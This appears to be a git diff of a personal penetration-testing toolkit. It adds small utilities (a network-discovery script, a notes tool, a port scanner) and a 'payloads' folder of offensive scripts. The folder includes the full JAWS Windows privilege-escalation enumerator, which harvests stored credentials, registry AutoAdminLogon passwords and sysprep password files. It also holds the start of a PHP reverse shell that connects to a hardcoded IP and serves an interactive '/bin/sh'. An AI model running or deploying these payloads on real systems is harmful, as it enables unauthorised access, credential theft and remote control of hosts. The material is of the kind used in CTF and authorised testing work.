  # Check if running as root (required by arp-scan / nmap ARP sweeps)
  if [[ $EUID -ne 0 ]]; then
    log_error "This script must be run as root (for network scanning)"
    echo "Please run: sudo $0"
    exit 1
  fi

  # Check dependencies (exit code 2 distinguishes "missing tools")
  check_dependencies || exit 2

  # Show header
  show_header

  # Show arp-scan tip if using nmap
  if [[ "$SCAN_METHOD" == "nmap" ]]; then
    echo -e "${YELLOW}💡 Tip: Install arp-scan for better device detection${NC}"
    echo -e "${YELLOW} Command: sudo apt install arp-scan${NC}"
    echo
  fi

  # Get local network (under set -e a failure here aborts the run)
  log "Detecting local network..."
  local network
  network=$(get_local_network)
  log "Network: $network"
  echo -e "${BLUE}ℹ️ Network: ${BOLD}$network${NC}"
  echo

  # Create temp files
  local scan_file results_file
  scan_file=$(mktemp)
  results_file=$(mktemp)
  # Only add scan_file to cleanup - we need results_file until display is done
  TEMP_FILES+=("$scan_file")

  # Scan network with whichever backend check_dependencies selected
  log "Scanning network with $SCAN_METHOD"
  if [[ "$SCAN_METHOD" == "arp-scan" ]]; then
    scan_network_arp_scan "$network" "$scan_file"
    parse_arp_scan_results "$scan_file" "$results_file"
  else
    scan_network_nmap "$network" "$scan_file"
    parse_nmap_results "$scan_file" "$results_file"
  fi

  # Check if we found any devices (-s: file exists and is non-empty)
  if [[ ! -s "$results_file" ]]; then
    log_error "No devices found on network"
    exit 1
  fi

  # Find newest device
  log "Analyzing results..."
  local newest_device
  newest_device=$(find_newest_device "$results_file")

  # Display results
  display_results "$results_file" "$newest_device"

  # Clean up results file after display
  rm -f "$results_file"

  log "✅ Network discovery complete"
}

# Run main function
main "$@"
|
||||||
192
scripts/note
Executable file
192
scripts/note
Executable file
|
|
@ -0,0 +1,192 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: note
# Description: Quick notes with tags, search, and project awareness
# Usage: note "quick thought" # Add note
# note -t security "found XSS" # Tagged note
# note -s "search term" # Search notes
# note -l # List recent notes
# note -e # Edit notes file

VERSION="1.0.0"

# Determine notes location (project-aware): inside a git working tree the
# notes live at the repository root as .notes.md; otherwise a single
# global file in $HOME is used.
if git rev-parse --git-dir > /dev/null 2>&1; then
  # In a git repo - use project notes
  NOTES_FILE="$(git rev-parse --show-toplevel)/.notes.md"
else
  # Global notes
  NOTES_FILE="$HOME/notes.md"
fi
|
||||||
|
|
||||||
|
# ANSI color codes used for terminal output.
# RED is required by the error paths of argument parsing (-t/-s); it was
# previously undefined, so referencing ${RED} crashed the script with an
# "unbound variable" error under `set -u`.
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
# Display usage, options, examples, and the active notes file location.
# Reads: VERSION, NOTES_FILE, CYAN, YELLOW, NC. Writes help text to stdout.
show_help() {
  printf '%b\n' "\033[1mnote\033[0m - Quick Notes Tool v${VERSION}"
  printf '\n'
  printf '%b\n' "\033[1mUSAGE:\033[0m"
  printf '%s\n' " note <text> Add a note"
  printf '%s\n' " note [OPTIONS]"
  printf '\n'
  printf '%b\n' "\033[1mOPTIONS:\033[0m"
  printf '%b\n' " \033[0;36m-t, --tag\033[0m Add note with tag"
  printf '%b\n' " \033[0;36m-s, --search\033[0m Search notes"
  printf '%b\n' " \033[0;36m-l, --list\033[0m List recent notes (last 10)"
  printf '%b\n' " \033[0;36m-e, --edit\033[0m Edit notes file"
  printf '%b\n' " \033[0;36m-p, --path\033[0m Show notes file path"
  printf '%b\n' " \033[0;36m-h, --help\033[0m Show this help message"
  printf '\n'
  printf '%b\n' "\033[1mEXAMPLES:\033[0m"
  printf '%s\n' ' note "remember to test this"'
  printf '%s\n' ' note -t security "found XSS in login"'
  printf '%s\n' ' note -t todo "implement feature X"'
  printf '%s\n' ' note -s "XSS"'
  printf '%s\n' ' note -l'
  printf '\n'
  printf '%b\n' "\033[1mNOTES LOCATION:\033[0m"
  printf '%s\n' " Current: ${NOTES_FILE}"
  if git rev-parse --git-dir > /dev/null 2>&1; then
    printf '%b\n' " ${CYAN}(Project notes - in git repo)${NC}"
  else
    printf '%b\n' " ${YELLOW}(Global notes)${NC}"
  fi
}
|
||||||
|
|
||||||
|
# Append a timestamped, tagged note entry to $NOTES_FILE.
# Arguments: $1 - note text; $2 - tag (defaults to "general")
# Outputs:   confirmation lines to stdout.
add_note() {
  local text="$1"
  local tag="${2:-general}"
  # `timestamp` was previously assigned without `local`, leaking a
  # global variable out of the function.
  local timestamp

  # Create file with a title header if it doesn't exist yet.
  if [[ ! -f "$NOTES_FILE" ]]; then
    echo "# Notes" > "$NOTES_FILE"
    echo >> "$NOTES_FILE"
  fi

  # Entry format: ## YYYY-MM-DD HH:MM - [TAG]
  timestamp=$(date '+%Y-%m-%d %H:%M')
  # Group the appends so the entry is written with a single redirection.
  {
    echo "## $timestamp - [$tag]"
    echo
    echo "$text"
    echo
  } >> "$NOTES_FILE"

  echo -e "${GREEN}✓${NC} Note added to: ${NOTES_FILE}"
  echo -e "${CYAN}Tag:${NC} $tag"
}
|
||||||
|
|
||||||
|
# Search notes case-insensitively, printing 2 lines of context around
# each match.
# Arguments: $1 - search query
# Exits 1 if no notes file exists yet.
search_notes() {
  local query="$1"

  if [[ ! -f "$NOTES_FILE" ]]; then
    echo -e "${YELLOW}No notes file found${NC}" >&2
    exit 1
  fi

  echo -e "${BOLD}${CYAN}Search results for: ${query}${NC}"
  echo

  # The original branched on `command -v bat` but ran the identical grep
  # in both branches; the dead conditional is removed. `--` keeps a query
  # starting with "-" from being parsed as a grep option.
  grep -i --color=always -B 2 -A 2 -- "$query" "$NOTES_FILE" || echo "No matches found"
}
|
||||||
|
|
||||||
|
# List the 10 most recent note entries (sections starting with "## ").
# Exits 1 if no notes file exists yet.
list_recent() {
  if [[ ! -f "$NOTES_FILE" ]]; then
    echo -e "${YELLOW}No notes file found${NC}" >&2
    exit 1
  fi

  echo -e "${BOLD}${CYAN}Recent Notes (last 10):${NC}"
  echo

  # Collect every "## " section, then print only the final 10.
  # The previous awk printed the FIRST 10 sections (contradicting the
  # "last 10" label) and the trailing `tail -n +2` chopped the first
  # header line of the output.
  awk -v max=10 '
    /^## / { n++ }
    n > 0  { sec[n] = sec[n] $0 "\n" }
    END {
      start = (n > max) ? n - max + 1 : 1
      for (i = start; i <= n; i++) printf "%s", sec[i]
    }
  ' "$NOTES_FILE"
}
|
||||||
|
|
||||||
|
# Open the notes file in $EDITOR (falling back to vim), creating it with
# a title header first if it does not exist yet.
edit_notes() {
  [[ -f "$NOTES_FILE" ]] || printf '# Notes\n\n' > "$NOTES_FILE"

  # Intentionally unquoted: EDITOR may contain flags (e.g. "code -w").
  ${EDITOR:-vim} "$NOTES_FILE"
}
|
||||||
|
|
||||||
|
# Print the path of the active notes file.
show_path() {
  printf '%s\n' "$NOTES_FILE"
}
|
||||||
|
|
||||||
|
# Parse arguments. With no arguments, print help and exit cleanly.
if [[ $# -eq 0 ]]; then
  show_help
  exit 0
fi

case $1 in
  -h|--help)
    show_help
    ;;
  -t|--tag)
    if [[ $# -lt 3 ]]; then
      # Literal red escape: RED is not defined with the other color
      # constants, so referencing ${RED} aborted the script here with an
      # "unbound variable" error under `set -u`.
      echo -e "\033[0;31mError:${NC} Tag and note text required" >&2
      echo "Usage: note -t <tag> <text>" >&2
      exit 1
    fi
    tag="$2"
    shift 2
    text="$*"
    add_note "$text" "$tag"
    ;;
  -s|--search)
    if [[ $# -lt 2 ]]; then
      echo -e "\033[0;31mError:${NC} Search query required" >&2
      exit 1
    fi
    shift
    search_notes "$*"
    ;;
  -l|--list)
    list_recent
    ;;
  -e|--edit)
    edit_notes
    ;;
  -p|--path)
    show_path
    ;;
  *)
    # Default: add note with "general" tag
    add_note "$*"
    ;;
esac
|
||||||
109
scripts/old-port-scanner.py
Executable file
109
scripts/old-port-scanner.py
Executable file
|
|
@ -0,0 +1,109 @@
|
||||||
|
#!/usr/bin/python3

# Information Security
# Certification Project #3

import socket
import common_ports  # project-local module; exposes ports_and_services mapping
import re

# NOTE(review): a single module-level socket is shared by get_open_ports;
# a TCP socket cannot be reconnected after a connection attempt, so
# reusing this one across many ports is unreliable — prefer one socket
# per probe.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Testing
# target = "www.freecodecamp.org"
# target = socket.gethostbyname("www.freecodecamp.org")
# target = "hi"
# port_range = [75,85]

# Testing Function
# get_open_ports(target, port_range)
|
||||||
|
|
||||||
|
|
||||||
|
def get_open_ports(target, port_range, verbose=None):
    """Return a list of open TCP ports on `target` within `port_range`.

    Args:
        target: hostname or IP address string.
        port_range: two-element sequence [start, end], inclusive.
        verbose: if truthy, also print a PORT/SERVICE table using the
            project-local common_ports lookup.

    Prints an error message and exits when the target cannot be
    resolved, mirroring the original behaviour.
    """
    # Resolve the target; on failure, classify it (IP-like vs name-like)
    # to pick the expected error message. The original set target_ip /
    # target_url flags here but exited unconditionally, so the flags and
    # the later exception handlers that read them were dead code.
    try:
        ip_addr = socket.gethostbyname(target)
    except socket.gaierror:
        if re.search(r'^[0-9]+', target):
            print('Error: Invalid IP address')
        elif re.search(r'^[A-Za-z]+', target):
            print('Error: Invalid hostname')
        else:
            print('Error: Invalid hostname or IP address')
        exit()

    start, end = port_range[0], port_range[-1]
    print(f'\n* Scanning Target: {target} ({ip_addr}) *')
    print('- Scanning ports:', start, 'to', end)

    # Probe each port with a fresh socket. Fixes in this loop:
    #  - the original nested a `while port <= port_range[1]` inside the
    #    for loop, appending duplicate ports;
    #  - `open_ports.append[port]` (brackets) was a TypeError;
    #  - connect_ex's result was never compared to 0;
    #  - settimeout() was called AFTER the connect attempt;
    #  - one global socket was reused for every connection.
    open_ports = []
    for port in range(start, end + 1):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)  # set before connecting so the timeout applies
        try:
            if sock.connect_ex((ip_addr, port)) == 0:
                open_ports.append(port)
        finally:
            sock.close()

    print('\n* Finished scanning target *')
    if not open_ports:
        print('No open ports found on target', target)
    else:
        print('Open ports found:', open_ports, 'on', target)

    if verbose:
        # Map each open port to a service name; .get() avoids the
        # KeyError the original dict comprehension raised for ports
        # absent from common_ports.ports_and_services.
        serv_d = common_ports.ports_and_services
        print(f'\nOpen ports for {target} ({ip_addr})')
        print('PORT     SERVICE')
        for port in open_ports:
            print(str(port) + '     ' + str(serv_d.get(port, 'unknown')))
    else:
        print('Open Ports:', open_ports)

    # The original's trailing `return (open_ports)` was unreachable
    # (both branches returned None first); return the list so callers
    # actually receive the results.
    return open_ports
|
||||||
1352
scripts/payloads/LinEnum.sh
Normal file
1352
scripts/payloads/LinEnum.sh
Normal file
File diff suppressed because it is too large
Load diff
20914
scripts/payloads/PowerView.ps1
Normal file
20914
scripts/payloads/PowerView.ps1
Normal file
File diff suppressed because it is too large
Load diff
280
scripts/payloads/jaws-enum.ps1
Normal file
280
scripts/payloads/jaws-enum.ps1
Normal file
|
|
@ -0,0 +1,280 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Windows enumeration script
|
||||||
|
.DESCRIPTION
|
||||||
|
This script is designed to be used in a penetration test or CTF
|
||||||
|
enviroment. It will enumerate useful information from the host
|
||||||
|
for privilege escalation.
|
||||||
|
.EXAMPLE
|
||||||
|
PS > .\jaws-enum.ps1
|
||||||
|
will write results out to screen.
|
||||||
|
.EXAMPLE
|
||||||
|
PS > .\jaws-enum.ps1 -OutputFileName Jaws-Enum.txt
|
||||||
|
Writes out results to Jaws-Enum.txt in current directory.
|
||||||
|
.LINK
|
||||||
|
https://github.com/411Hall/JAWS
|
||||||
|
#>
|
||||||
|
Param(
# Path to write results to; an empty string writes to the console instead.
[String]$OutputFilename = ""
)
|
||||||
|
|
||||||
|
# Collect host, user, network, software, filesystem and privilege-escalation
# information into one report string ($output). Reads the script-scoped
# $OutputFilename parameter: if set, the report is written to that file,
# otherwise it is printed to the console.
function JAWS-ENUM {
write-output "`nRunning J.A.W.S. Enumeration"
# The whole report is accumulated into $output and emitted once at the end.
$output = ""
$output = $output + "############################################################`r`n"
$output = $output + "## J.A.W.S. (Just Another Windows Enum Script) ##`r`n"
$output = $output + "## ##`r`n"
$output = $output + "## https://github.com/411Hall/JAWS ##`r`n"
$output = $output + "## ##`r`n"
$output = $output + "############################################################`r`n"
$output = $output + "`r`n"
# --- Basic host facts (OS, arch, hostname, current user, time) ---
$win_version = (Get-WmiObject -class Win32_OperatingSystem)
$output = $output + "Windows Version: " + (($win_version.caption -join $win_version.version) + "`r`n")
$output = $output + "Architecture: " + (($env:processor_architecture) + "`r`n")
$output = $output + "Hostname: " + (($env:ComputerName) + "`r`n")
$output = $output + "Current User: " + (($env:username) + "`r`n")
$output = $output + "Current Time\Date: " + (get-date)
$output = $output + "`r`n"
$output = $output + "`r`n"
write-output " - Gathering User Information"
# --- Local users and their group memberships via ADSI/WinNT ---
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Users`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
$adsi.Children | where {$_.SchemaClassName -eq 'user'} | Foreach-Object {
# Reflection call fetches each group's Name property from the COM object.
$groups = $_.Groups() | Foreach-Object {$_.GetType().InvokeMember("Name", 'GetProperty', $null, $_, $null)}
$output = $output + "----------`r`n"
$output = $output + "Username: " + $_.Name + "`r`n"
$output = $output + "Groups: " + $groups + "`r`n"
}
$output = $output + "`r`n"
# --- Network configuration, ARP cache, open connections ---
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Network Information`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + (ipconfig | out-string)
$output = $output + "`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Arp`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + (arp -a | out-string)
$output = $output + "`r`n"
$output = $output + "`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " NetStat`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + (netstat -ano | out-string)
$output = $output + "`r`n"
$output = $output + "`r`n"
# --- Firewall state via the legacy HNetCfg COM interface ---
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Firewall Status`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + "`r`n"
$Firewall = New-Object -com HNetCfg.FwMgr
$FireProfile = $Firewall.LocalPolicy.CurrentProfile
if ($FireProfile.FirewallEnabled -eq $False) {
$output = $output + ("Firewall is Disabled" + "`r`n")
} else {
# NOTE(review): "Firwall" typo is in the emitted string; left untouched.
$output = $output + ("Firwall is Enabled" + "`r`n")
}
$output = $output + "`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " FireWall Rules`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
# Helper: filter the HNetCfg.FwPolicy2 rule set by any combination of
# name/direction/enabled/protocol/profile/action/grouping, then emit the rules.
Function Get-FireWallRule
{Param ($Name, $Direction, $Enabled, $Protocol, $profile, $action, $grouping)
$Rules=(New-object -comObject HNetCfg.FwPolicy2).rules
If ($name) {$rules= $rules | where-object {$_.name -like $name}}
If ($direction) {$rules= $rules | where-object {$_.direction -eq $direction}}
If ($Enabled) {$rules= $rules | where-object {$_.Enabled -eq $Enabled}}
If ($protocol) {$rules= $rules | where-object {$_.protocol -eq $protocol}}
If ($profile) {$rules= $rules | where-object {$_.Profiles -bAND $profile}}
If ($Action) {$rules= $rules | where-object {$_.Action -eq $Action}}
If ($Grouping) {$rules= $rules | where-object {$_.Grouping -like $Grouping}}
$rules}
$output = $output + (Get-firewallRule -enabled $true | sort direction,applicationName,name | format-table -property Name , localPorts,applicationname | out-string)
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Hosts File Content`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + "`r`n"
$output = $output + ((get-content $env:windir\System32\drivers\etc\hosts | out-string) + "`r`n")
$output = $output + "`r`n"
write-output " - Gathering Processes, Services and Scheduled Tasks"
# --- Processes (with owning user), scheduled tasks, services ---
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Processes`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + ((Get-WmiObject win32_process | Select-Object Name,ProcessID,@{n='Owner';e={$_.GetOwner().User}},CommandLine | sort name | format-table -wrap -autosize | out-string) + "`r`n")
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Scheduled Tasks`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + "Current System Time: " + (get-date)
# CSV round-trip filters out the repeated per-section header rows schtasks emits.
$output = $output + (schtasks /query /FO CSV /v | convertfrom-csv | where { $_.TaskName -ne "TaskName" } | select "TaskName","Run As User", "Task to Run" | fl | out-string)
$output = $output + "`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Services`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + (get-service | Select Name,DisplayName,Status | sort status | Format-Table -Property * -AutoSize | Out-String -Width 4096)
$output = $output + "`r`n"
write-output " - Gathering Installed Software"
# --- Installed programs, hotfixes, and Program Files listings ---
$output = $output + "`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Installed Programs`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + (get-wmiobject -Class win32_product | select Name, Version, Caption | ft -hidetableheaders -autosize| out-string -Width 4096)
$output = $output + "`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Installed Patches`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + (Get-Wmiobject -class Win32_QuickFixEngineering -namespace "root\cimv2" | select HotFixID, InstalledOn| ft -autosize | out-string )
$output = $output + "`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Program Folders`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + "`n`rC:\Program Files`r`n"
$output = $output + "-------------"
$output = $output + (get-childitem "C:\Program Files" -EA SilentlyContinue | select Name | ft -hidetableheaders -autosize| out-string)
$output = $output + "C:\Program Files (x86)`r`n"
$output = $output + "-------------------"
$output = $output + (get-childitem "C:\Program Files (x86)" -EA SilentlyContinue | select Name | ft -hidetableheaders -autosize| out-string)
$output = $output + "`r`n"
write-output " - Gathering File System Information"
# --- Files writable by non-default identities (FullControl/Modify ACLs) ---
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Files with Full Control and Modify Access`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$files = get-childitem C:\
foreach ($file in $files){
try {
# NOTE(review): ".*inf" in the -include list looks like a typo for "*.inf";
# left as-is to preserve behaviour.
$output = $output + (get-childitem "C:\$file" -include *.ps1,*.bat,*.com,*.vbs,*.txt,*.html,*.conf,*.rdp,.*inf,*.ini -recurse -EA SilentlyContinue | get-acl -EA SilentlyContinue | select path -expand access |
where {$_.identityreference -notmatch "BUILTIN|NT AUTHORITY|EVERYONE|CREATOR OWNER|NT SERVICE"} | where {$_.filesystemrights -match "FullControl|Modify"} |
ft @{Label="";Expression={Convert-Path $_.Path}} -hidetableheaders -autosize | out-string -Width 4096)
}
catch {
$output = $output + "`nFailed to read more files`r`n"
}
}

# --- Folders writable by non-default identities ---
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Folders with Full Control and Modify Access`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$folders = get-childitem C:\
foreach ($folder in $folders){
try {
$output = $output + (Get-ChildItem -Recurse "C:\$folder" -EA SilentlyContinue | ?{ $_.PSIsContainer} | get-acl | select path -expand access |
where {$_.identityreference -notmatch "BUILTIN|NT AUTHORITY|CREATOR OWNER|NT SERVICE"} | where {$_.filesystemrights -match "FullControl|Modify"} |
select path,filesystemrights,IdentityReference | ft @{Label="";Expression={Convert-Path $_.Path}} -hidetableheaders -autosize | out-string -Width 4096)
}
catch {
$output = $output + "`nFailed to read more folders`r`n"
}
}
$output = $output + "`r`n"
# --- Drives, unquoted service paths, recent/interesting user files ---
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Mapped Drives`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + (Get-WmiObject -Class Win32_LogicalDisk | select DeviceID, VolumeName | ft -hidetableheaders -autosize | out-string -Width 4096)
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Unquoted Service Paths`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
# Classic unquoted-service-path check: auto-start services outside
# C:\Windows whose image path is not quoted.
$output = $output + (cmd /c 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """')
$output = $output + "`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Recent Documents`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + (get-childitem "C:\Users\$env:username\AppData\Roaming\Microsoft\Windows\Recent" -EA SilentlyContinue | select Name | ft -hidetableheaders | out-string )
$output = $output + "`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Potentially Interesting Files in Users Directory `r`n"
$output = $output + "-----------------------------------------------------------`r`n"
# NOTE(review): "*.vnc.*.ini" looks like a typo for "*.vnc,*.ini"; left as-is.
$output = $output + (get-childitem "C:\Users\" -recurse -Include *.zip,*.rar,*.7z,*.gz,*.conf,*.rdp,*.kdbx,*.crt,*.pem,*.ppk,*.txt,*.xml,*.vnc.*.ini,*.vbs,*.bat,*.ps1,*.cmd -EA SilentlyContinue | %{$_.FullName } | out-string)
$output = $output + "`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " 10 Last Modified Files in C:\User`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + (Get-ChildItem 'C:\Users' -recurse -EA SilentlyContinue | Sort {$_.LastWriteTime} | %{$_.FullName } | select -last 10 | ft -hidetableheaders | out-string)
$output = $output + "`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " MUICache Files`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
# Only registry keys whose property data references C:\ paths are reported.
get-childitem "HKCU:\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\" -EA SilentlyContinue |
foreach { $CurrentKey = (Get-ItemProperty -Path $_.PsPath)
if ($CurrentKey -match "C:\\") {
$output = $output + ($_.Property -join "`r`n")
}
}
$output = $output + "`r`n"
$output = $output + "`r`n"
write-output " - Looking for Simple Priv Esc Methods"
# --- Common privilege-escalation indicators ---
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " System Files with Passwords`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$files = ("unattended.xml", "sysprep.xml", "autounattended.xml","unattended.inf", "sysprep.inf", "autounattended.inf","unattended.txt", "sysprep.txt", "autounattended.txt")
$output = $output + (get-childitem C:\ -recurse -include $files -EA SilentlyContinue | Select-String -pattern "<Value>" | out-string)
$output = $output + "`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " AlwaysInstalledElevated Registry Key`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
# Both HKLM and HKCU must be checked; each is reported independently.
$HKLM = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer"
$HKCU = "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer"
if (($HKLM | test-path) -eq "True")
{
if (((Get-ItemProperty -Path $HKLM -Name AlwaysInstallElevated).AlwaysInstallElevated) -eq 1)
{
$output = $output + "AlwaysInstallElevated enabled on this host!"
}
}
if (($HKCU | test-path) -eq "True")
{
if (((Get-ItemProperty -Path $HKCU -Name AlwaysInstallElevated).AlwaysInstallElevated) -eq 1)
{
$output = $output + "AlwaysInstallElevated enabled on this host!"
}
}
$output = $output + "`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Stored Credentials`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + (cmdkey /list | out-string)
$output = $output + "`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Checking for AutoAdminLogon `r`n"
$output = $output + "-----------------------------------------------------------`r`n"
# AutoAdminLogon stores plaintext default credentials in the registry.
$Winlogon = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
if (get-itemproperty -path $Winlogon -Name AutoAdminLogon -ErrorAction SilentlyContinue)
{
if ((get-itemproperty -path $Winlogon -Name AutoAdminLogon).AutoAdminLogon -eq 1)
{
$Username = (get-itemproperty -path $Winlogon -Name DefaultUserName).DefaultUsername
$output = $output + "The default username is $Username `r`n"
$Password = (get-itemproperty -path $Winlogon -Name DefaultPassword).DefaultPassword
$output = $output + "The default password is $Password `r`n"
$DefaultDomainName = (get-itemproperty -path $Winlogon -Name DefaultDomainName).DefaultDomainName
$output = $output + "The default domainname is $DefaultDomainName `r`n"
}
}
$output = $output + "`r`n"
# --- Emit the report: file if requested, otherwise console ---
if ($OutputFilename.length -gt 0)
{
$output | Out-File -FilePath $OutputFileName -encoding utf8
}
else
{
clear-host
write-output $output
}
}
|
||||||
|
|
||||||
|
# Entry point: when an output file was requested, probe that it is
# writable before running the (long) enumeration so a bad path fails
# fast; otherwise run and write the report to the console.
if ($OutputFilename.length -gt 0)
{
Try
{
# Open-then-close verifies write access without leaving a handle open.
[io.file]::OpenWrite($OutputFilename).close()
JAWS-ENUM
}
Catch
{
Write-Warning "`nUnable to write to output file $OutputFilename, Check path and permissions"
}
}
else
{
JAWS-ENUM
}
|
||||||
8579
scripts/payloads/linpeas.sh
Normal file
8579
scripts/payloads/linpeas.sh
Normal file
File diff suppressed because one or more lines are too long
2696
scripts/payloads/linux-exploit-suggester.sh
Normal file
2696
scripts/payloads/linux-exploit-suggester.sh
Normal file
File diff suppressed because it is too large
Load diff
192
scripts/payloads/php-reverse-shell.php
Normal file
192
scripts/payloads/php-reverse-shell.php
Normal file
|
|
@ -0,0 +1,192 @@
|
||||||
|
<?php
|
||||||
|
// php-reverse-shell - A Reverse Shell implementation in PHP
|
||||||
|
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
|
||||||
|
//
|
||||||
|
// This tool may be used for legal purposes only. Users take full responsibility
|
||||||
|
// for any actions performed using this tool. The author accepts no liability
|
||||||
|
// for damage caused by this tool. If these terms are not acceptable to you, then
|
||||||
|
// do not use this tool.
|
||||||
|
//
|
||||||
|
// In all other respects the GPL version 2 applies:
|
||||||
|
//
|
||||||
|
// This program is free software; you can redistribute it and/or modify
|
||||||
|
// it under the terms of the GNU General Public License version 2 as
|
||||||
|
// published by the Free Software Foundation.
|
||||||
|
//
|
||||||
|
// This program is distributed in the hope that it will be useful,
|
||||||
|
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
// GNU General Public License for more details.
|
||||||
|
//
|
||||||
|
// You should have received a copy of the GNU General Public License along
|
||||||
|
// with this program; if not, write to the Free Software Foundation, Inc.,
|
||||||
|
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
|
||||||
|
//
|
||||||
|
// This tool may be used for legal purposes only. Users take full responsibility
|
||||||
|
// for any actions performed using this tool. If these terms are not acceptable to
|
||||||
|
// you, then do not use this tool.
|
||||||
|
//
|
||||||
|
// You are encouraged to send comments, improvements or suggestions to
|
||||||
|
// me at pentestmonkey@pentestmonkey.net
|
||||||
|
//
|
||||||
|
// Description
|
||||||
|
// -----------
|
||||||
|
// This script will make an outbound TCP connection to a hardcoded IP and port.
|
||||||
|
// The recipient will be given a shell running as the current user (apache normally).
|
||||||
|
//
|
||||||
|
// Limitations
|
||||||
|
// -----------
|
||||||
|
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
|
||||||
|
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
|
||||||
|
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
|
||||||
|
//
|
||||||
|
// Usage
|
||||||
|
// -----
|
||||||
|
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
|
||||||
|
|
||||||
|
set_time_limit (0);
|
||||||
|
$VERSION = "1.0";
|
||||||
|
$ip = '127.0.0.1'; // CHANGE THIS
|
||||||
|
$port = 1234; // CHANGE THIS
|
||||||
|
$chunk_size = 1400;
|
||||||
|
$write_a = null;
|
||||||
|
$error_a = null;
|
||||||
|
$shell = 'uname -a; w; id; /bin/sh -i';
|
||||||
|
$daemon = 0;
|
||||||
|
$debug = 0;
|
||||||
|
|
||||||
|
//
|
||||||
|
// Daemonise ourself if possible to avoid zombies later
|
||||||
|
//
|
||||||
|
|
||||||
|
// pcntl_fork is hardly ever available, but will allow us to daemonise
|
||||||
|
// our php process and avoid zombies. Worth a try...
|
||||||
|
if (function_exists('pcntl_fork')) {
|
||||||
|
// Fork and have the parent process exit
|
||||||
|
$pid = pcntl_fork();
|
||||||
|
|
||||||
|
if ($pid == -1) {
|
||||||
|
printit("ERROR: Can't fork");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($pid) {
|
||||||
|
exit(0); // Parent exits
|
||||||
|
}
|
||||||
|
|
||||||
|
// Make the current process a session leader
|
||||||
|
// Will only succeed if we forked
|
||||||
|
if (posix_setsid() == -1) {
|
||||||
|
printit("Error: Can't setsid()");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
$daemon = 1;
|
||||||
|
} else {
|
||||||
|
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
|
||||||
|
}
|
||||||
|
|
||||||
|
// Change to a safe directory
|
